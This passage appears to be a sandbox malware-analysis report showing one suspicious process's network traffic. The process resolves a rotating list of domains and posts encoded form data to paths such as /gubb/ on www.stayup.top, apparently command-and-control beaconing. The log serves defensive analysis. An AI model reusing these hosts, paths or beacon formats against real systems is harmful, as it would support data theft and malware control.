Sep 26, 2024 14:26:27.292053938 CEST	53	57218	1.1.1.1	192.168.2.4
Sep 26, 2024 14:26:40.588277102 CEST	59160	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:26:40.599239111 CEST	53	59160	1.1.1.1	192.168.2.4
Sep 26, 2024 14:26:48.666377068 CEST	52103	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:26:48.702740908 CEST	53	52103	1.1.1.1	192.168.2.4
Sep 26, 2024 14:27:01.822330952 CEST	64739	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:27:01.834532022 CEST	53	64739	1.1.1.1	192.168.2.4
Sep 26, 2024 14:27:24.555890083 CEST	52170	53	192.168.2.4	1.1.1.1
Sep 26, 2024 14:27:24.566447973 CEST	53	52170	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 14:23:49.253144026 CEST	192.168.2.4	1.1.1.1	0x1c2f	Standard query (0)	www.63582.photo	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:05.433195114 CEST	192.168.2.4	1.1.1.1	0x38b8	Standard query (0)	www.bonusgame2024.online	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:13.510858059 CEST	192.168.2.4	1.1.1.1	0x8fdb	Standard query (0)	www.stayup.top	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:27.823844910 CEST	192.168.2.4	1.1.1.1	0xa2c0	Standard query (0)	www.luxe.guru	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:41.025011063 CEST	192.168.2.4	1.1.1.1	0x4619	Standard query (0)	www.newdaydawning.net	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:55.088186979 CEST	192.168.2.4	1.1.1.1	0xdde6	Standard query (0)	www.theclydefund.info	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:08.275425911 CEST	192.168.2.4	1.1.1.1	0xe94c	Standard query (0)	www.crowsecurity.cloud	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:21.432838917 CEST	192.168.2.4	1.1.1.1	0x22e9	Standard query (0)	www.languyenthuyduyen.xyz	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:35.916846991 CEST	192.168.2.4	1.1.1.1	0x902e	Standard query (0)	www.comrade.lol	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:49.978952885 CEST	192.168.2.4	1.1.1.1	0xdd1a	Standard query (0)	www.13149200.xyz	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:58.448014975 CEST	192.168.2.4	1.1.1.1	0xb215	Standard query (0)	www.inf30027group23.xyz	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:59.444051027 CEST	192.168.2.4	1.1.1.1	0xb215	Standard query (0)	www.inf30027group23.xyz	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:13.806335926 CEST	192.168.2.4	1.1.1.1	0x8f2b	Standard query (0)	www.mudanya-nakliyat.xyz	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:27.276947021 CEST	192.168.2.4	1.1.1.1	0x8c56	Standard query (0)	www.solargridxx.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:40.588277102 CEST	192.168.2.4	1.1.1.1	0xe4a2	Standard query (0)	www.popin.space	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:48.666377068 CEST	192.168.2.4	1.1.1.1	0xb737	Standard query (0)	www.airtech365.net	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:27:01.822330952 CEST	192.168.2.4	1.1.1.1	0xc004	Standard query (0)	www.x100.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:27:24.555890083 CEST	192.168.2.4	1.1.1.1	0x9007	Standard query (0)	www.bonusgame2024.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 14:23:49.281284094 CEST	1.1.1.1	192.168.2.4	0x1c2f	No error (0)	www.63582.photo	6ybpt9er.as66588.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:23:49.281284094 CEST	1.1.1.1	192.168.2.4	0x1c2f	No error (0)	6ybpt9er.as66588.com	azkwupgf.as66588.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:23:49.281284094 CEST	1.1.1.1	192.168.2.4	0x1c2f	No error (0)	azkwupgf.as66588.com		147.92.40.174	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:05.446938038 CEST	1.1.1.1	192.168.2.4	0x38b8	Name error (3)	www.bonusgame2024.online	none	none	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:14.099090099 CEST	1.1.1.1	192.168.2.4	0x8fdb	No error (0)	www.stayup.top		203.161.43.245	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:27.846785069 CEST	1.1.1.1	192.168.2.4	0xa2c0	No error (0)	www.luxe.guru		13.248.169.48	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:27.846785069 CEST	1.1.1.1	192.168.2.4	0xa2c0	No error (0)	www.luxe.guru		76.223.54.146	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:41.037054062 CEST	1.1.1.1	192.168.2.4	0x4619	No error (0)	www.newdaydawning.net	newdaydawning.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:24:41.037054062 CEST	1.1.1.1	192.168.2.4	0x4619	No error (0)	newdaydawning.net		44.213.25.70	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:55.116763115 CEST	1.1.1.1	192.168.2.4	0xdde6	No error (0)	www.theclydefund.info	theclydefund.info		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:24:55.116763115 CEST	1.1.1.1	192.168.2.4	0xdde6	No error (0)	theclydefund.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:24:55.116763115 CEST	1.1.1.1	192.168.2.4	0xdde6	No error (0)	theclydefund.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:08.308176994 CEST	1.1.1.1	192.168.2.4	0xe94c	No error (0)	www.crowsecurity.cloud	crowsecurity.cloud		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:25:08.308176994 CEST	1.1.1.1	192.168.2.4	0xe94c	No error (0)	crowsecurity.cloud		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:08.308176994 CEST	1.1.1.1	192.168.2.4	0xe94c	No error (0)	crowsecurity.cloud		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:22.246493101 CEST	1.1.1.1	192.168.2.4	0x22e9	No error (0)	www.languyenthuyduyen.xyz		103.255.237.233	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:35.929969072 CEST	1.1.1.1	192.168.2.4	0x902e	No error (0)	www.comrade.lol	comrade.lol		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:25:35.929969072 CEST	1.1.1.1	192.168.2.4	0x902e	No error (0)	comrade.lol		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:35.929969072 CEST	1.1.1.1	192.168.2.4	0x902e	No error (0)	comrade.lol		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:59.732269049 CEST	1.1.1.1	192.168.2.4	0xb215	No error (0)	www.inf30027group23.xyz	inf30027group23.xyz		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:25:59.732269049 CEST	1.1.1.1	192.168.2.4	0xb215	No error (0)	inf30027group23.xyz		221.121.144.149	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:25:59.732335091 CEST	1.1.1.1	192.168.2.4	0xb215	No error (0)	www.inf30027group23.xyz	inf30027group23.xyz		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:25:59.732335091 CEST	1.1.1.1	192.168.2.4	0xb215	No error (0)	inf30027group23.xyz		221.121.144.149	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:13.933239937 CEST	1.1.1.1	192.168.2.4	0x8f2b	No error (0)	www.mudanya-nakliyat.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:26:13.933239937 CEST	1.1.1.1	192.168.2.4	0x8f2b	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:26:13.933239937 CEST	1.1.1.1	192.168.2.4	0x8f2b	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:27.292053938 CEST	1.1.1.1	192.168.2.4	0x8c56	No error (0)	www.solargridxx.shop	solargridxx.shop		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:26:27.292053938 CEST	1.1.1.1	192.168.2.4	0x8c56	No error (0)	solargridxx.shop		50.3.111.89	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:40.599239111 CEST	1.1.1.1	192.168.2.4	0xe4a2	Name error (3)	www.popin.space	none	none	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:48.702740908 CEST	1.1.1.1	192.168.2.4	0xb737	No error (0)	www.airtech365.net	airtech365.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 14:26:48.702740908 CEST	1.1.1.1	192.168.2.4	0xb737	No error (0)	airtech365.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:26:48.702740908 CEST	1.1.1.1	192.168.2.4	0xb737	No error (0)	airtech365.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:27:01.834532022 CEST	1.1.1.1	192.168.2.4	0xc004	No error (0)	www.x100.shop		13.248.252.114	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:27:01.834532022 CEST	1.1.1.1	192.168.2.4	0xc004	No error (0)	www.x100.shop		99.83.138.213	A (IP address)	IN (0x0001)	false
Sep 26, 2024 14:27:24.566447973 CEST	1.1.1.1	192.168.2.4	0x9007	Name error (3)	www.bonusgame2024.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.63582.photo

www.stayup.top

www.luxe.guru

www.newdaydawning.net

www.theclydefund.info

www.crowsecurity.cloud

www.languyenthuyduyen.xyz

www.comrade.lol

www.inf30027group23.xyz

www.mudanya-nakliyat.xyz

www.solargridxx.shop

www.airtech365.net

www.x100.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	147.92.40.174	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:23:49.300483942 CEST	459	OUT	GET /i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.63582.photo Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Sep 26, 2024 14:23:50.377820969 CEST	328	IN	HTTP/1.1 530 Date: Thu, 26 Sep 2024 12:23:50 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Set-Cookie: guard=81b2c77bGUlPbhReg2dk5qyHbNuMjRLQNA==; path=/;Expires=Thu, 26-Sep-24 12:33:50 GMT Cache-Control: no-cache Server: cdn Data Raw: 32 37 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 5f 67 75 61 72 64 2f 61 75 74 6f 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 27<script src="/_guard/auto.js"></script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	203.161.43.245	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:14.119827032 CEST	720	OUT	POST /gubb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.stayup.top Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close Cache-Control: no-cache Origin: http://www.stayup.top Referer: http://www.stayup.top/gubb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 6c 4e 4c 41 65 32 6c 30 51 6b 70 62 42 30 76 6b 36 72 79 46 36 4d 2b 6f 64 4e 4f 48 66 69 35 64 38 6f 76 37 37 38 79 53 6b 73 51 63 67 68 5a 31 44 46 5a 78 4e 4d 7a 4a 4e 45 73 59 78 6a 57 55 6b 46 35 44 71 31 61 4d 2b 68 4a 66 44 4e 53 66 2f 43 57 69 6d 51 36 44 58 44 4a 55 4d 53 48 79 70 61 44 65 4b 73 47 34 4f 35 76 57 6d 31 35 6d 7a 4c 69 71 39 4d 6f 55 37 66 71 38 57 53 42 42 4b 49 47 69 4c 35 46 6d 71 76 47 79 35 35 43 6b 2f 4f 37 69 49 69 44 31 73 51 6b 71 51 4e 55 4a 4e 69 47 7a 6e 41 47 72 38 6b 77 43 56 56 57 4c 68 39 72 4b 4f 54 64 4e 34 6e 48 74 37 4e 66 79 65 67 3d 3d Data Ascii: sL9tFJ=lNLAe2l0QkpbB0vk6ryF6M+odNOHfi5d8ov778ySksQcghZ1DFZxNMzJNEsYxjWUkF5Dq1aM+hJfDNSf/CWimQ6DXDJUMSHypaDeKsG4O5vWm15mzLiq9MoU7fq8WSBBKIGiL5FmqvGy55Ck/O7iIiD1sQkqQNUJNiGznAGr8kwCVVWLh9rKOTdN4nHt7Nfyeg==
Sep 26, 2024 14:24:14.719847918 CEST	595	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Sep 2024 12:24:14 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	203.161.43.245	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:17.125307083 CEST	740	OUT	POST /gubb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.stayup.top Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close Cache-Control: no-cache Origin: http://www.stayup.top Referer: http://www.stayup.top/gubb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 6c 4e 4c 41 65 32 6c 30 51 6b 70 62 44 55 66 6b 35 49 61 46 74 38 2b 6e 42 64 4f 48 4e 69 35 5a 38 76 6e 37 37 39 33 56 6b 61 41 63 6a 45 6c 31 43 48 78 78 4f 4d 7a 4a 47 6b 73 64 37 44 57 4b 6b 46 30 2b 71 33 65 4d 2b 69 31 66 44 4e 69 66 2f 78 2b 68 6c 67 36 46 66 6a 4a 61 42 79 48 79 70 61 44 65 4b 73 54 54 4f 35 33 57 6e 47 78 6d 68 36 69 70 6a 63 6f 58 2b 66 71 38 53 53 42 46 4b 49 47 36 4c 38 67 75 71 73 2b 79 35 34 79 6b 2f 61 58 68 64 53 43 77 68 77 6b 2f 55 38 56 66 45 53 37 59 2f 69 47 78 38 32 73 48 64 7a 48 52 77 4d 4b 64 63 54 35 2b 6c 67 4f 5a 32 4f 69 37 46 6e 71 42 37 48 55 32 59 75 74 30 6f 74 6c 68 43 70 4e 43 57 54 6f 3d Data Ascii: sL9tFJ=lNLAe2l0QkpbDUfk5IaFt8+nBdOHNi5Z8vn7793VkaAcjEl1CHxxOMzJGksd7DWKkF0+q3eM+i1fDNif/x+hlg6FfjJaByHypaDeKsTTO53WnGxmh6ipjcoX+fq8SSBFKIG6L8guqs+y54yk/aXhdSCwhwk/U8VfES7Y/iGx82sHdzHRwMKdcT5+lgOZ2Oi7FnqB7HU2Yut0otlhCpNCWTo=
Sep 26, 2024 14:24:17.707094908 CEST	595	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Sep 2024 12:24:17 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	203.161.43.245	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:19.672338963 CEST	10822	OUT	POST /gubb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.stayup.top Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close Cache-Control: no-cache Origin: http://www.stayup.top Referer: http://www.stayup.top/gubb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 73 4c 39 74 46 4a 3d 6c 4e 4c 41 65 32 6c 30 51 6b 70 62 44 55 66 6b 35 49 61 46 74 38 2b 6e 42 64 4f 48 4e 69 35 5a 38 76 6e 37 37 39 33 56 6b 61 49 63 6a 79 78 31 44 6d 78 78 50 4d 7a 4a 61 30 73 63 37 44 58 57 6b 46 63 36 71 33 43 32 2b 6b 35 66 44 73 43 66 35 41 2b 68 79 77 36 46 64 6a 4a 62 4d 53 48 64 70 61 7a 61 4b 73 44 54 4f 35 33 57 6e 48 42 6d 32 37 69 70 68 63 6f 55 37 66 71 4b 57 53 42 74 4b 49 75 41 4c 39 68 4d 71 64 65 79 38 6f 69 6b 38 76 37 68 66 79 43 79 79 41 6c 36 55 35 4d 42 45 52 50 2b 2f 6a 69 50 38 30 77 48 66 6c 47 2b 74 49 2b 64 4e 53 6f 73 79 41 6a 79 2f 49 32 59 63 42 4b 32 39 33 4d 52 61 65 78 6f 67 4b 49 66 57 36 63 49 56 55 31 75 71 34 6f 31 4d 32 5a 6b 69 79 44 2b 34 71 6a 37 4c 4c 4a 6c 72 35 38 41 30 6f 61 39 54 68 76 51 65 4a 47 6a 67 48 37 4c 6f 6a 6c 38 55 4a 57 6d 77 4d 36 47 55 70 52 30 6e 69 51 4d 42 55 38 32 57 44 4b 51 5a 74 51 54 4f 6c 34 51 4b 5a 4b 67 63 61 71 30 56 77 76 41 4e 77 42 77 51 79 58 34 64 43 72 72 47 6a 37 38 37 76 70 45 66 51 75 4e 61 4a 43 [TRUNCATED] Data Ascii: sL9tFJ=lNLAe2l0QkpbDUfk5IaFt8+nBdOHNi5Z8vn7793VkaIcjyx1DmxxPMzJa0sc7DXWkFc6q3C2+k5fDsCf5A+hyw6FdjJbMSHdpazaKsDTO53WnHBm27iphcoU7fqKWSBtKIuAL9hMqdey8oik8v7hfyCyyAl6U5MBERP+/jiP80wHflG+tI+dNSosyAjy/I2YcBK293MRaexogKIfW6cIVU1uq4o1M2ZkiyD+4qj7LLJlr58A0oa9ThvQeJGjgH7Lojl8UJWmwM6GUpR0niQMBU82WDKQZtQTOl4QKZKgcaq0VwvANwBwQyX4dCrrGj787vpEfQuNaJChr3nSIEnoYiu3mUGDmSUM/YWOGGIJnhoNozauzyXUdGpfR4dY+VprOr0dsUIpBGI2wYkja/NWXc/ACGMyxMX/T/obFNPP/DqJAkhwdeh3HxE23h55FFvGEmtzDZDj0Ycj8c9Z8KrL7RkdiDeQN45TT/Cz8vdD5ToAUXjVizNkdjzmwbkClok3NV6PGTeFM3gXsz0BQha55G6ixUZZ72y3Zb/xOOyEPhqzsw0VTubm2LkbaGg6yI2YBRy0fEd2SuAqJHatTxhFx+3Psx5iAC5qKj/ktDTGU1RQovAxkvnyxW+CanQnhATjn8FWW2VuDzkLDia2DjCiGnWbqI5Sz+LHg1jmPsVLHYL+33Oyg6Uw+BCL6nZWOWi32Cu46RxyAmjD3DiywpCuXKNx0YOhxb+xcr6zbr4ifiitDiFfMECnH0WoNUAYgAwMnYHHV/uro1GEhrAvwVlrTIjGZYdqqNnvAyqX6AHGDdx72/2omqcb/fX90kX89tBuw073xMeswY1OJnDdF+JAKdG+YMfu6Ag6XLXA1HvF3egmtaM0NAq5uKaye52CadS7hkFH+OrNQvToM1ISB9ur2QXNa1Yv4S+7zHianNaeyQ3EM76TSXz4h8JFywYmZjHQI7mV8pY6cRBKvhbqsqOAHODxf8OiKK3TqpxFEWG+LlcoO [TRUNCATED]
Sep 26, 2024 14:24:20.262463093 CEST	595	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Sep 2024 12:24:20 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 389 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	203.161.43.245	80	1748	C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 14:24:22.213630915 CEST	458	OUT	GET /gubb/?sL9tFJ=oPjgdHtcRwBFU1aA9ZOuj8Coc4bNSQhA+Z/l/vbVu6gyzA9FNnh3E8/0K3U760fP/mUdrl6a4REPJue/mxKU4Ri2QVEaCVjMmKnjA5rRPYPki2Nnm5W7gsk=&gB7t=xFqX1hC8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.stayup.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
